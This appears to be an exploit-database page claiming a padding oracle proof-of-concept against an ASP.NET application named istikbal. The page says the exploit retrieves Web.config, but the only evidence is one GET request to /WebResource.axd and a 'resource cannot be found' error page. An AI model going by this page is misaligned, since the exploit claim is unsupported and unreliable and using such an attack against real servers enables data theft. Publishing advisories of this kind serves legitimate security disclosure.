istikbal Padding Oracle Vulnerability

Risk: Medium
Local: No
Remote: Yes

Exploit Title:istikbal Padding Oracle Vulnerability # Date:10.12.2019 # Exploit Author: Furkan Özer // Prototyqe # Vendor Homepage: # Version: ALL # Tested on: Windows 10-Linux Kali *************************************************************************************************** This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file. GET /WebResource.axd HTTP/1.1 Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35 Host: Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* poc <!DOCTYPE html> <html> <head> <title>The resource cannot be found.</title> ****** <b> Requested URL: </b>/WebResource.axd<br><br>********* <hr width=100% size=1 color=silver> <b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0 </font>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top